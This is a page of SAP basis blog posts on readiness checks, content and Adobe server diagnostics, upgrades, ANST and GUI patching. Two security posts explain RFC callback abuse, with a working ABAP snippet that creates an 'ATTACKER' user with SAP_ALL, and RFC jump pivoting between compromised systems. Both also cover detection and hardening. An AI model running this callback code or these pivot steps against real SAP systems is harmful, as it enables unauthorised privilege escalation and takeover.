saptechnicalguru – Page 37 – Saptechnicalguru.com

S/4 HANA readiness check

SAP has released S4HANA readiness check 2.0. Please read this blog on the new tool version.

If you want to use old version, please read on.

This blog explains the new tool for SAP customers to prepare for S/4 HANA upgrade: S/4 HANA readiness check.

Questions that will be answered are:

What is the S/4 HANA readiness check?
How to execute it?
What results can I expect?

S/4 HANA readiness check

The S/4 HANA readiness check is a tool from SAP that can help you prepare for S/4 HANA upgrade. The tool is a web based online tool running in SAP cloud that is using 2 files with data from your system:

Extract from your customer code
Usage data of transactions measured in your system (based on ST03N data)

The outcome is online report with list of potential improvements in S/4 HANA that might be relevant for your business and list of potential issues when upgrading caused by custom code or by generic changes by SAP.

The end user guide of the tool can be found on the SAP site.

Execution of S/4 HANA readiness check

The main note for the readiness check is 2290622. This note describes that there 2 ways to run the check:

Via solution manager
Directly

The direct approach is the most easy. The exact steps are always updated in OSS note 2310438. Carefully implement all the prerequisite notes mentioned in this note.

After this is done 2 programs will be available.

Program SYCM_DOWNLOAD_REPOSITORY_INFO will download the ABAP custom developments.

The program will check if the where-used index is up to date. If not it will refer to OSS note 2234970. This note can be bit confusing. But basically what you need to do is run program SAPRSEUB in the background (and wait up to 2 days on larger system with many custom code!!).

Please note the following: As a prerequisite for SAP Note 2185390 or the program SYCM_DOWNLOAD_REPOSITORY_INFO, please start only the program SAPRSEUB! Do not start SAPRSEUC. If you use an MSSQL database, you must implement SAP Note 1554667 before starting SAPRSEUB; otherwise, database problems occur. More on ABAP where used index via SAPRSEUB see blog link.

The second program will capture analysis data: TMW_RC_DOWNLOAD_ANALYSIS_DATA.

You will have to start this program a few times. Every time it will launch a new batch job for each tick box you have selected.

Both of the programs will deliver you a zip file that you store on local PC or laptop.

These result files you upload in the SAP cloud part of the tool on the SAP support portal: https://launchpad.support.sap.com/#readiness.

Now you have to wait until the analysis is done.

Result of the S/4 HANA readiness check tool

When the analysis is finished you first enter the dashboard:

When zooming in you will reach the detailed screens with all the small details and relevant OSS note references:

Top right in the details list there is the button to create the results document. This is easier for sharing the results with management, since they typically don’t have an S user to logon to the tool.

Running S4HANA ABAP checks in your own system

With the remote ATC tool with special variant S4HANA Readiness you can run the ABAP checks in your onw system. Read this blog for more information.

New content for new S4HANA versions

With every new version of S4HANA (and its intermediate feature packs) SAP will update the simplification list and the corresponding OSS notes. This will also impact the analysis programs. OSS note 2399707 – Simplification Item Check lists down which note version you need to apply to your system to have the checks for the S4HANA version of your choice. For the newer notes you will have to use the TCI based OSS notes (see blog on notes tips & tricks).

If you have installed the latest TCI note, you also get a new program called /SDF/RC_START_CHECK. After start of this program you get this screen:

You now can immediately see if you have new versions of OSS notes to apply to get most recent checks.

And after the run, you can use the button Application Log to see a more detailed result list on the simplification checks carried out in your system.

Custom ABAP code analysis

For a more detailed analysis on your custom ABAP code you can use the remote ATC tooling for a more detailed analysis. See this blog for details.

SAP content server technical tips and tricks

This blog will give you technical tips and tricks regarding the SAP content server.

Questions that will be answered are:

How can I check technical connection to content server?
How can I check that the content server functions work from technical side?
How can I test a cache server setup?
How can I extend to a file size limit above 2 GB?
How to check if a document exists in the content server?
How can I log document deletions?
How can I check and fix long response times?

Technical connection test to SAP content server

The first obvious connection test is in the administration function of the content server. Start transaction OAC0 (starts with letter O and ends with zero) and select your content server. On the next screen hit the check button. If the test is ok, click on the CSADMIN button and the detailed screen comes. There should be a green light behind your content repository. If no connection or no green light, there are issues in the linking and communication to content server (content server down, firewall block, etc). More details are in OSS note 2457912 – How to create a content repository in OAC0?.

CSADMIN only works properly with SAP content server. With external products there are restrictions. See OSS note 1879152 – CSADMIN: HTTP error: 400 Bad Request 5010: wrong usage.

Technical function test of SAP content server

To test if all the SAP content server functions are working from the technical level you can use test program RSCMST. Unfortunately there is no transaction linked by SAP, so you have to use SE38 or SA38 to start the program. After filling out the content server on first screen, you come to the second screen where you can launch the detailed tests. Per test you have to click the execute button.

Green means test has run and ok. Red is the unfortunate one where test has run and result is not ok. Yellow means test has not yet been executed.

In an ideal case all lights are green. If you have red light best to fix it by either applying OSS note to ABAP server or patch to content server.

Your specific company might not use all the technical options for content server (like the above HTTP using mCreate), but this is hard to correlate to end user scenario’s. If your users are facing issues with content server and not all lights are green on this report, it is a basis issue to be solved.

More background on the tests: OSS note 1482012 – Check the connection to content server.

Remark: the test program RSCMST can have bugs by itself. So check for latest version of this program and apply the OSS notes before running and relying on the program. Last known updates are from July 2017, by looking at keyword RSCMST in the SAP notes.

If you are running on content server 7.53 or higher, please read OSS notes 2888195 – Content Server 7.53 and report RSCMST and 2897793 – RSCMSTH2 reports errors for Content Server 7.53. This notes state that only the first 3 checks are relevant for 7.53 and higher.

Bug fix notes:

Content server check in monitoring

By using a custom ABAP program, you can test the link from ABAP server to content server and alert to monitoring. Read this blog on how to achieve this and the source of the custom ABAP program.

Content server performance

Program RSHTTP80 can be used to test the content server performance. Background OSS note: 579366 – Content server performance.

Testing cache server setup

If you have a cache server setup and want to check if that works properly, also here test program RSCMST is used. Read OSS note 2083855 – How to check cache server access on the exact parameters to fill out.

File size limit larger than 2 GB

If you want to store files larger than 2 GB, follow the instruction from this OSS note: 1705940 – Check in/out of files larger than 2GB in SAP Content Server. 2023376 – 2 GB Enablement from Knowledge Provider.

Migration of documents

You can migrate documents from the database to content server. Read this dedicated blog.

Timeout issues

For most timeout issues there is an issue with the content server. Check if the database or logfiles are not full. Reference: 2547719 – SAP Content Server: timeout error.

Long response times

In some cases attachments might have an unexpected long response time (despite small size of document). This can happen with GOS attachments and other (custom) code re-using the GOS attachments. Read OSS note 1783987 – Long response time for document display in Attachment list to set SU33 user parameters SAPHTTP_RFC_CHECK_TO and SAPCMS_RFC_CHECK_TO to value FAILED as solution. The note also explains the background.

Check document existence

To check if a document exists on the content server, follow the instructions from OSS note 2251113 – Check whether a document exists on SAP Content Server database.

Checking document deletion

If you want more information on document deletion, apply the settings from OSS note 2005308 – KPro Delete Logs to let the system log the knowledge provider document deletions in the SLG1 application log.

Signatures

Please be careful with the signature settings. They have to be consistent. This setting can be made in OAC0 for the repository and in CSADMIN for the content server. These have to be consistent. If not you get unexpected issues that it does not work, and it is hard to detect that this dis-balance in settings are causing the issue.

Content repository changes in the landscape

You best do NOT transport content repository changes. Do the OAC0 maintenance locally. This is described in OSS note 3228661 – How to transport content repository configuration in OAC0. Same for deletion of OAC0 entries: do not transport, but local delete in each system: 2939014 – How to delete a Content Repository using Transport Request?.

Using SAP database as content server

The settings to use the SAP database as content server are described in this OSS note: 3448453 – Configuring Content Repository of type ‘SAP Database’.

If possible don't use this option if you have a HANA database. All attachments and documents will be loaded into expensive memory and expensive license.

How to resolve the error “Tables COMPONENT and COMPONENT_DATA are inconsistent”?

In some very specific cases you will get the error “Tables COMPONENT and COMPONENT_DATA are inconsistent”. Solution for this issue might be to regenerate SAPHTTP and SAPHTTPA destinations with program RSHTTP05.

Reference OSS notes:

Adobe document server (ADS) technical tips and tricks

This blog will provide technical tips and tricks for Adobe Document Server (ADS) used from ABAP stack.

Questions that will be answered are:

How to retrieve ADS version information from ABAP stack?
How to test if the technical and functional connection from ABAP stack to ADS is working?
Where to find information on Adobe LifeCycle Designer?
Where to find more information on further issue analysis?

Reading the Adobe Document Server version from the ABAP stack

Run program FP_PDF_TEST_00 (unfortunately no transaction linked, so you need to run it from SE38 or SA38). Result is the ADS server version information.

ADS link test programs

There are two main test programs to run to check the connection from the ABAP stack to the Adobe Document Server.

First run program FP_PDF_TEST_00 (unfortunately no transaction linked, so you need to run it from SE38 or SA38). The output will be the version number of the Adobe Document server. If this check works, the connection from ABAP to ADS is working at network level and low basis level.

The second test program is called FP_CHECK_DESTINATION_SERVICE (unfortunately no transaction linked, so you need to run it from SE38 or SA38). The output is just number of bytes sent. If this check works, the connection from ABAP to ADS is working for functional forms connection as well.

In case of issues with FP_CHECK_DESTINATION_SERVICE, most likely the roles on the ADS JAVA side are not correct. Read the OSS note (with video) 2378564 – How to configure ADS_AGENT roles SAP_BC_FP_ICF and SAP_BC_FPADS_ICF [VIDEO] for the solution.

OSS notes:

Adobe LifeCycle designer

For developing the forms you need to install Adobe LifeCycle designer on your developer laptop or desktop. The most recent list of versions and patches is kept on dedicated SAP wiki page.

Further issue analysis on setup

Follow the step in this SAP blog for further issue analysis. If this blog does not help, you can use the details from the very extensive OSS note “944221 – Error analysis for problems in form processing”.

Troubleshooting OSS notes:

Switching on standard SAP delivered ADS forms

SAP has delivered many ADS forms to replace existing SapScript and SmartForms. Unfortunately these are not default turned on. Also not on newly installed systems. To unlock all the standard SAP delivered ADS forms, goto SFW5 and activate the switch ERP_ALL_FORMS:

After this is done, run report RERP_EHP_SHOW_FORM_LIST. This list will give you pointer for each form what to change in customizing to point to new ADS form.

SICF services

Adobe document server connection requires these 2 SICF services to be active:

/default_host/sap/bc/fp
/default_host/sap/bc/fpads

Check also these 2 OSS notes:

Adobe licenses

The general use to print output via ADS is included in the SAP license. If you want to use the advanced interactive form capability: this is subject to extra license. See oss note 750784 – SAP Interactive Forms: Licenses.

RFC callback hacking

This blog explains about RFC callback hacking.

When you start transaction SM59 for setting up RFC connections, you might see the red icon telling you RFC callback check not secure.

This blog will explain you following:

How can a hacker exploit this RFC callback weakness?
How to make the RFC callback secure?
What is the difference between RFC callback simulation and intervention?
What to do in case of a valid use of RFC callback?

RFC callback hacking in action

What the RFC callback does is basically firing back function modules to the sender. These modules are then executed on the originating system with the privileges of the original caller.

If an attacker has gained access to one system and modifies code that is called from another system it can fire commands to the other system with the privileges of the caller.

In the example below the attacker has altered the standard RFC_PING function module (code snippet is below). He then convinces a high privilege admin of the target system to remotely call and ping the compromised system for example by asking the admin to do a connection test in SM59 (which calls the RFC_PING module). The callback code is fired against the target system and is run with the user ID of the admin (not of the attacker) of the target system.

Code snippet of modified RFC_PING:

Call module to create user on destination ‘BACK’ and set the password.
Assign the privilege SAP_ALL (highest available privilege)

 DATA: ZLV_BAPIBNAME TYPE SY-UNAME.
 DATA: ZLS_BAPILOGOND TYPE BAPILOGOND.
 DATA: ZLV_BAPIPWD TYPE XUNCODE.
 DATA: ZLS_BAPIADDR3 TYPE BAPIADDR3.
 DATA: ZLT_BAPIRET2 TYPE TABLE OF BAPIRET2.
 DATA: ZLS_BAPIPROF TYPE BAPIPROF.
 DATA: ZLT_BAPIPROF TYPE TABLE OF BAPIPROF.
 
   ZLV_BAPIBNAME = 'ATTACKER'.
   ZLS_BAPILOGOND-USTYP = 'A'.
   ZLV_BAPIPWD = 'Welcome_in1!'.
   ZLS_BAPIADDR3-LASTNAME = 'Attacker'.
 
   CALL FUNCTION 'BAPI_USER_CREATE1' DESTINATION 'BACK'
     EXPORTING
       USERNAME                      = ZLV_BAPIBNAME
       LOGONDATA                     = ZLS_BAPILOGOND
       PASSWORD                      = ZLV_BAPIPWD
       ADDRESS                       = ZLS_BAPIADDR3.
 
 ZLS_BAPIPROF-BAPIPROF = 'SAP_ALL'.
 APPEND ZLS_BAPIPROF TO ZLT_BAPIPROF.
 ZLS_BAPIPROF-BAPIPROF = 'SAP_NEW'.
 APPEND ZLS_BAPIPROF TO ZLT_BAPIPROF.
 
 CALL FUNCTION 'BAPI_USER_PROFILES_ASSIGN' DESTINATION 'BACK'
   EXPORTING
     USERNAME       = ZLV_BAPIBNAME
   TABLES
     PROFILES       = ZLT_BAPIPROF
     RETURN         = ZLT_BAPIRET2.

If the admin executes the ping towards the compromised system he will see this screen:

The only suspicious part the admin might see is the slightly longer logon time (in which the callback is executed).

End result on target system: ATTACKER user created by ADMIN user.

With the privileges:

This is one example. There are many different creative ways in which a callback RFC can be misused.

Detection of the RFC callbacks

RFC callback actions are registered in the SAP audit log if they are configured. The default classification is warning for RFC callback.

Audit log trace for the above action looks as follows:

How to make the RFC callback secure?

The SAP system parameter rfc/callback_security_method (set it in RZ11) is determining the RFC callback behavior.

rfc/callback_security_method set to 1 means basically “do nothing”. This is the insecure default setting and it will result into the red traffic light on SM59 RFC connection setup screen.

rfc/callback_security_method set to 2 means “simulation active”. With this setting entries are written to the audit log (for setup of the audit log see this blog). This setting is still insecure!

It can be used on a productive system to see which callbacks are coming in and do analysis before switching to 3 (fully secure, but immediate interception).

Make sure in the audit log, that the simulation is captured:

Simulate for a while, and the generate the white list (or positive list):

rfc/callback_security_method set to 3 means that the system will do interfception of RFC callback methods. This is the secure setting. The SM59 RFC connection traffic light will now show green:

Callback positive lists

In some cases an RFC callback is used with a good intention and reason. These exceptions can be put into the callback positive list. Per RFC on the Logon & security tab you can activate the combination of called and called back function modules.

If you have enabled the audit log, you can use it to generate RFC callback positive lists. In SM59 select the option: RFC / Generate RFC Callback Positive List.

Check to apply OSS note 2863851 – RFC Callback Positive Lists not created.

If you have spaces in the RFC, or by accident add a space as well, it can also give issues. Apply OSS note 2941068 – sm59/Callback whitelist input validation missing to fix this issue.

A callback can be seen as ST22 dump CALL_FUNCTION_BACK_REJECTED: see OSS note 2981184 – What to do in case of CALL_FUNCTION_BACK_REJECTED short dump.

OSS notes

Explanation notes:

Bug fix notes:

Known positive callback: SAP CUA

SAP CUA (central user administration) uses a callback to fetch profiles. In your CUA system per RFC to remote child CUA system you have to set the following positive callback:

(SUSR_ZBV_GET_REMOTE_PROFILES and SUSR_ZBV_SEND_PROFILES)

Known positive callback: SAP screen painter RFC EU_SCRP_WN32

In the screen painter RFC EU_SCRP_WN32 add the following list of modules (see OSS note 2251931 – Runtime error CALLBACK_REJECTED_BY_WHITELIST in graphical Screen Painter):

RS_SCRP_GF_PROCESS_640 RFC_GET_FUNCTION_INTERFACE

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RBUILDINFO

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RELEMTABLE

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RICONS

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RKEYS

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RKEYTEXTS

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RMESSAGES

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RPROPTABLE

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RSTATUS_40

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RTEXTS

RS_SCRP_GF_PROCESS_640 RS_SCRP_GF_RDDICFIELDS

The screen painter is hardly used nowadays at all. Normally developer use this tool only on development system.

Known positive callback: remote ATC scenario

See OSS note 3084103 – Analyze reference check variants for RFC callbacks.

Known random callback issue: transport related callback calls

Some cases around transports are know. For example with system copies and refreshes. An RFC callback dump on module TRINT_PROGRESS_INDICATOR might occur on RFC destination BACK. In the dump you will find the real RFC (type TCP/IP) destination with variable LV_TP_DESTINATION. Regeneration is needed. Follow the instructions of OSS note 3356141 – CALLBACK_REJECTED_BY_WHITELIST when showing transport orders buffer.

Preparation for SAP upgrade or support package

This blog explains about preparation you can do for SAP upgrade of support package.

Questions that will be answered are:

Where to find support package schedule?
Where to find version information on upgrades?
Do I need to do delta sizing for upgrade?
Do I need to perform extra preparation steps for an S4HANA upgrade?
Determining the version: why not to use the latest minus one?

Latest available main version for upgrade

For the latest available version you can check the SAP product availability matrix site. This is also know as the SAP-PAM.

After finding the right product on the first tab you can see the current release details and end of support date.

On the second tab you see the upgrade paths that are supported:

In the middle the target version. On the left hand the versions from which you can upgrade. To the right are even higher versions you can upgrade to.

Also check here the support Linux versions. You might be surprised: you often need to upgrade the operating system first before you can upgrade your application.

Same for the HANA database or database version: newer releases of functional software will force you to upgrade your database as (or upgrade database first).

Latest available versions of support packages

The latest available versions of support packages are published by SAP on the SAP support package stacks page. On this page click on the SAP support package stack maintenance schedule link to download the latest version of the schedule.

Support package version: minus one or latest?

In many companies there is a policy to never take the latest version of a support package. The line of thinking is: let other people solve the bugs of SAP first.

Current delivery of ABAP support packages is quite good. And the frequency is not so high as in the past. For ECC about 2 to 3 support packages per year are released (as compare to 6 to 9 in the past in the 4.6 ages).

In stead of taking minus one, you can also consider this rule: at point of go-live make sure that the support package is at least released 3 months ago. This will counter the risk of having an issue which is not discovered by anyone else before.

People using the rule minus one without thinking should not be trusted. It is like going to Apple and insisting on Iphone 11, because you don't trust Iphone 12 and use the rule minus one...

Delta sizing

Delta sizing for support packages is not needed. Delta sizing for an upgrade might be required if:

Upgrade crosses multiple versions (for example upgrade from Netweaver 6.20 to Netweaver 7.51)
Upgrade is including a new database (for example migration to HANA database)
Specific upgrade manual is specific about delta sizing (for example the upgrade from SAP solution manager 7.1 to 7.2 is specific enough to carry out delta sizing)
For ECC to S4HANA conversion

Custom code

For analyzing custom code before the upgrade you can use the CDMC toolset. For more information read this blog.

Also use the clone finder to find clones. You might need to delete the clones or adjust them after the upgrade. More information on the clone finder tool can be read in this blog.

Releasing transports and cleaning up transport pipeline

For both support package and upgrade releasing transports is a technical must. It is wise to start a few months before already cleaning up the transport pipeline (transports that are old and not released in development system, transports that are imported into quality environment, but no imported in productive system).

Check the clients

Check if you still have client 001 or 066. If yes, consider deletion. See dedicated blog.

BI queues

During the upgrade all BI queues must be empty. Check it upfront and/or delete them. For more information on BI queue deletion, read this dedicated blog.

Inactive code and data dictionary objects

Before upgrade or support pack can start all code and data dictionary objects must be activated or deleted.

In some rare cases there are inconsistencies in the data dictionary objects. Check table DWINACTIV in this case.

Side effect report for support packages

Per support package SAP keeps track of the unwanted side effects. OSS note 2388572 explains you how to retrieve them for your support package. Best to scan the side effects and apply the ones you think are needed.

For upgrades the side effects list is too large: here you simply need to test and fix any issues encountered.

New functions

After the upgrade you can start to use new functions. Some main functions are listed in the SAP help pages. The more unknown small features are listed by SAP in the SAP improvements finder xls. This xls has 2 tabs: first with the most recent and second with the long list of improvements since 2014. Per improvement you need to check pee-conditions of release and support package, but if you upgraded to recent version, most of the improvements will be installed. Some improvements are always active, some need extra activation steps. This is documented per improvement item.

New security parameters

After an upgrade (not support packs) new security parameters can be introduced to SAP. Prepare already which ones might impact you. For S4HANA upgrades and new security parameters read this dedicated blog.

S4HANA upgrade preparations

If you are upgrading your existing S4HANA upgrade, read this dedicated blog on S4HANA upgrade preparations. And run the readiness check: read this blog.

S4HANA conversion preparations

An upgrade from ECC to S4HANA requires a different approach. In this upgrade also the simplification items and custom code migrations must be done. Read more in this dedicated blog.

For more S4HANA conversion preparations, read this blog.

Aftercare after upgrade

For aftercare after upgrade or support package read this blog.

ANST: automated notes search tool

This blog will explain one of the most useful new tools from SAP when having to find bugs in standard SAP coding. The ANST (automated notes search tool) is not receiving the recognition that is should get. In usability it is same ease as the SNOTE tool.

If you love SNOTE you will also love the ANST tool! Just try it out.

Questions that will be answered in this blog:

What is the ANST automated notes search tool?
How does is work?
Why should I always use this tool before submitting an incident to SAP?

ANST (advanced notes search tool)

The ANST tool can help you in:

Quickly finding OSS notes for your issue
Check if you Z code is causing the issue or dump, or it is a standard SAP issue

OSS note 1818192 is the ANST FAQ note which also has the minimum version. This note also has an extensive explanation. The how to use below is just a summary.

OSS note 2605555 also contains an excellent PDF inside as attachment, that gives a step by step manual.

How to use the ANST tool?

Start transaction code ANST.

If you launch it for first time you might get an error "ANST001 Fatal Error. Customizing table is not filled". If this is the case follow the solution steps in OSS note 1909768.

In the transaction code box key in the transaction where you have the issue. As example we will use transaction code S_BCE_68001417 (search for authorizations by complex criteria). The user admin is complaining about an incorrect number of selected authorizations that are shown in that transaction.

So key in the transaction code and description (you can keep it same).

Now press execute: the transaction will be called. In the authorization object screen fill out S_DEVELOP and execute again to get the results:

Now leave the transaction recording.

In the left bottom of the screen you can see the recording being written into the trace file:

Depending on the complexity and amount of screens you have passed this can take up to 1 to 10 minutes.

The result is shown after the trace file. The result is sorted per SAP module. If you open the details, you can also see the exact program blocks that were hit during the recording.

ANST trace result list per module and program block

Now you can select the modules (if wanted specific code blocks) where you thinks is the issue. After selection hit the Note Search button. The SAP system will now connect to SAP service marketplace and look for the most recent notes for your version, which have not yet been implemented.

The middle note seems to be very relevant. From this screen you can can already link to the note (click on note number) and start download to SNOTE already.

Tips on the selection of the components:
1. Never select more than 1000 components: ANST will reject this
2. The less components you select the faster you get results, and shorter list of potential notes as well
3. If you want you can later retrieve the recording and make a different search on different components: no need to re-record
4. Most of the times you can ignore the basis and cross application and basis notes
5. Run the recording and the result together with your functional consultant: he can help filter the components and select useful notes

Changing settings for maximum amount of notes

Especially in the basis or core ABAP area you will notice that ANST cannot read more than 1000 notes at once. This is a default setting you can easily change. In the main ANST screen hit the Settings button and scroll to the right to increase the maximum notes number:

Using ANST to analyze short dumps

The ANST tool can be used as well to analyze short dumps. Just start the ANST tool and run the steps including the step where the dump occurs. After the dump the ANST tool will trace the modules including the point where the dump occurs.

Make sure OSS note 2535278 is applied: this contains bug fix for the short dump case.

Checking for customer code issues

After the trace file is generated and you have searched for OSS notes, it can be there is still an issue caused by your own customer code. To exclude this (or to check it anyhow), you have to use the button Customer Code from the trace result screen with all the components. Be a bit patient while the tool is scanning for modifications, user-exits, BADI implementations and enhancement spots it came across in the recording.

If you want to analyze implicit and explicit enhancements as well with ANST you must apply OSS note 2408785 first.

ANST clickable demo

SAP has made a nice clickable demo to show you how it works: link to demo.

Use of ANST tool before submitting incident to SAP

Even if the ANST tool does not help you search for the correct OSS note for your issue, the ANST tool can help you in speed up of the incident solution for SAP.

If you want to report the issue to SAP as an incident download the ANST trace file. If you report the incident mention:

ANST tool is used and add the recording
Add list of already implemented OSS notes
You already checked for customer code

With this information the first line processor will have a quick job assigning the incident to the real issue solvers in Walldorf. This will save you valuable time, since the first line normally come with simple list of notes, or also run the ANST tool themselves, and then come with obvious notes.

Increasing the maximum number of objects limit

If you are using the ANST tool on a transaction with many objects (for example ME21n purchase order), you will notice that you cannot search for more than 1000 objects at the same time. Then you have to open subsection and select subtree and run it more than once with different selections. But sometimes one node really expands into more than 1000 objects. In this case, you best increase the maximum object limit. In ANST start screen choose the Settings button can increase the Max.Object counter on the far right of the settings (scrolling required)

Needless to say, more objects do take more time to analyze. But it is worth the wait.

Relevant OSS notes

Some interesting OSS notes to review:

When analyzing very large transactions, you might face CX_SY_CONVERSION_OVERFLOW dump. For workaround read this OSS note: 2921867 – ANST: Dump “CONVT_OVERFLOW” “CX_SY_CONVERSION_OVERFLOW”.

Other errors and bug fix notes:

While switching to new SAP support backbone you might get a connection error. Follow the instructions from OSS note 2781045 – ANST / ST22 note search “Connection cannot be established” to solve it. Also apply OSS notes 2730525 – Consuming the Note Search Webservice and 2818143 – SEARCH_NOTES- Implementing SOAP Based Note Search.

And: 2829951 – Error while calling ANST Note Search WebService.

ANST for web applications and FIORI

ANST can also be used for web applications and FIORI. See this blog.

Retrieving actual detailed SAP component information

This blog will explain you how to retrieve actual detailed SAP component information.

Questions that will be answered:

How do I get detailed system component information?
How do I download these to compare them across the landscape?

System / Status

The most simple way of getting installation component information is by using the menu System/Status. Then click on the Status details button:

Now the installed software components and product versions will be shown:

In S4HANA systems, you might not be getting all the details or an authorization error. The information display in S4HANA requires extra authorizations for object S_SYS_INFO. Background is explained in OSS note 2658772 – System -> Status: Restriction of the available information.

Getting the details as download

The system status details cannot be downloaded. If you want to compare the software components in detail across your system landscape (sandbox, development, test, acceptance, productive, training etc environments), you are in need of these details in downloadable format. With the downloaded data it is easy in Excel to compare all details.

To get the details goto transaction SE37.

For the installed software use function module OCS_GET_INSTALLED_SWPRODUCTS. Execute it and click on the ET_SWPRODUCTS outcome table.

Installed products via OCS_GET_INSTALLED_SWPRODUCTS

For the details on all installation components and support pack status use function module OCS_GET_INSTALLED_COMPS. Execute it and click on the TT_COMPTAB:

Installed components via OCS_GET_INSTALLED_COMPS

In an ECC system this list will be very long. Use the option System / List / Save as / local file to download the complete list in text format.

Warning: don't rely on the content of table CVERS. In the past this used be reliable, but currently it is not any more. Warning from SAP not to rely on this is written in OSS note 2464887. The routines above read the PAT03 table, which holds all the installs, and then determine the most recently installed patch to show. S4HANA systems have both table CVERS and CVERS_ACT for activated components......

Retrieving component information via SQF

You can also retrieve the component information via the Support Query Framework (SQF). Start transaction SQF and launch the Installed Components and Support Packages query:

Query runs fast and double click the line to see the results:

SPAM clean up

In some cases inconsistencies can be removed by running RSSPAM15 (SPAM clean up program). This program does multiple cleanups. Some part is CVERS updates.

OSS notes

3390139 – Reported system information (installed software components or products) is missing or incorrect

SAP GUI patching

This blog will zoom in on SAP GUI patching.

Questions that will be addressed are:

Where can I find the latest SAP GUI patch availability status?
Where can I find the planning for SAP GUI patches?
What should be my SAP GUI patch and upgrade policy?

SAP GUI latest patch availability overview and future planned patches

One of the best places to check the latest available is on the SAP blog: SAP GUI latest patch. This site also contains the planning for the next upcoming patch.

More on the new SAP GUI 8.0 can be found in this blog.

Current SAP GUI support overview

The SAP GUI support dates are published by SAP in OSS note 147519. Note 66971 – Supported SAP GUI platforms contains the supported platforms. This is important when also a new Windows platform (like Windows 11) is released. The expected release dates for GUI patches and versions for windows are listed in OSS note 1053737 – Expected release dates for SAP GUI for Windows.

GUI integration testing

When upgrading and/or patching of SAP GUI, consider following elements as well:

Chrome or Egde integration and browser support
Office integration
Use of GUI scripting
Use of SAP screen personas
Use of ACF (active component framework)

Corresponding NWBC backend OSS notes

When patching the NWBC front end, or when using NWBC html client, you should also check for server side corrections. The list of most recent note(s) to be applied is kept in OSS note 1353538 – NWBC -Patch Collection- SERVER SIDE (ABAP)+NWBC for HTML. To retrieve your current NWBC backend server patch version follow the instructions in OSS note 1864151 – How to determine the version and Patch Level of NWBC Runtime Environment.

SAP GUI patching policy

SAP GUI and its patches tend to have very short support timelines. An SAP GUI version nowadays is only supported up to max 2 years after release. Reason behind this: the SAP GUI builds on top of windows component which have very short support cycle.

If your company policy is to always have support IT software, you will have to plan and execute an SAP GUI upgrade almost yearly to stay within full SAP support. Put it on your yearly budget and execution calendar as a recurring item.

If you don’t want to go into this yearly effort of testing, packaging and deploying the SAP GUI to your end users, you can opt for this, as long as you are aware of the consequences. Just make sure of the following two main items:

Inform your IT management and service managers that you run the GUI without support, and they approve it.
Check with your windows team that they will still have the libraries in windows desktop/laptop that the SAP GUI needs.

SAP system hacking using RFC jump

This blog will explain the SAP system hacking using RFC jump method. It will show the simplicity of the hack, and tell you what to do in preventing this method to be used on your SAP system.

Question that will be answered:

How does the RFC jump SAP system hack work?
How do I check all my RFC’s for this weakness?
What can I do to prevent this hack from happening on my system?

RFC jump hack background

SAP uses RFC connections between SAP systems to send and received business data. For example the BI system will pull data from the ECC system via an RFC connection. The SAP solution manager system is fed from the ECC system via an RFC connection. Or a SAP netweaver gateway system serving SAP FIORI tiles.

In the RFC setup the system admin will have to set the connection details and its logon method. The logon methods can be:

Current user via logon screen
Current user via trust logon screen
Fixed user ID: dialog user ID or background user ID

The first method with logon screen will prompt for user ID and password and is not useful for hacking.

The trusted connection will check the rights in the other SAP system using your own user ID and privileges.

The RFC’s with fixed user ID’s will use the user ID and privileges of the user ID in the RFC connection and also using password entered by the admin. So you don’t even need to know the password…..

3 methods of misusing the RCF jump

3 methods of misusing the RFC jump will be explained. All of the scenario’s start from a already compromised system.

You have gained access to an SAP system, which in first instance is less important. For example by using standard SAP passwords (see blog on this topic).

1. Using the weakness to jump from one system to another: named dialog users in RFC

Now you start to scan the RFC’s of this server in SM59.

You notice that there is an RFC to another system which has the user ID and password of the system admin. You now simply click the remote logon button and you jump to the other system.

You are logged on now into this system with the user ID and privileges of this other user ID. From this system you can even jump further.

This way you could go from a development to productive server. Or from a BI to an ECC server. Or from Solution manager to ECC productive server.

2. Using the weakness to jump from one system to another: named background users in RFC

The jump will not work if the user ID in the RFC is a background user ID. One example here is the ALEREMOTE user in ECC, which is used by the BI system to extract data from ECC. Since this user has to pull a lot of data and is needing a lot of privileges this user ID is sometimes given SAP_ALL privileges.

If this is the case the hacker can still misuse this RFC. In the hacked system he goes to transaction SE37 and creates a test function module sequence consisting of 2 calls: BAPI_USER_CHANGE and BAPI_TRANSACTION_COMMIT.

The first call will have the input to change user ID ALEREMOTE user type from B (background) to type A (dialog). The commit is needed to actually confirm and push the change to the database. Once the sequence is setup the hacker will use the test function to fire the sequence. In the testing the hacker will put in the RFC with the ALEREMOTE user. Now this sequence will be fired with the privileges of the ALEREMOTE user (it has SAP_ALL). So it will then itself change its own user type remotely…. After this is done the dialog jump will work from the remote system and the hacker comes into the system with user ALEREMOTE and the attached SAP_ALL rights.

3. Using the weakness to jump from one system to another: trusted RFC’s

If you have taken over one system and you see a trusted RFC towards another system this can be misused for hacking.

But you need extra information. If you know the user ID of the admin in the system target, set up the user ID in the system already taken over, or if already there reset password. Then logon in the taken over system with the admin user ID. Goto SM59 to the trusted connection. Click remote logon and you jump to the other system without having to logon, but with the user ID and privileges of the admin.

For setup of trusted RFC’s read this blog.

How to detect the jumps which are misused?

The complexity in detection is not to detect the jumps itself, because there is also good use of the jumps (via the trusted RFC’s), but to detect the misused jumps. This is hardly possible.

Detection can be done for the user changes executed by background users. Detection could be done with tracking the terminal ID suddenly switching user ID.

The SAP audit log can help you find traces to what has happened as detective after the fact method. But it will not help you detect or prevent misuse.

How to scan your RFC’s for potential misuse?

SAP provides a program to check RFC’s for weak settings: RSRFCCHK.

Running this program will leave system log messages: 2724967 - Program CL_SAIS_ Reports Security Breach notification when running program RSRFCCHK

If you start the program select all the destinations and optionally the connection test to see if the connections work at all.

The result will give you a list of potentially dangerous RFC connections and the user ID’s used.

This you can use as a work list for checking.

Read more on RFC security checking in this blog.

Apply note 3283474 – Adjustment of authorization for program RSRFCCHK to upgrade security of program RSRFCCHK itself.

Protection measures

Protection is possible by a series of actions (a single action will not be sufficient):

Access restriction. Restriction of access to SU01 user management and SM59 RFC setup. Not only on main systems, but also on connected trusted systems.
Remove SAP_ALL and user rights from background and RFC users.
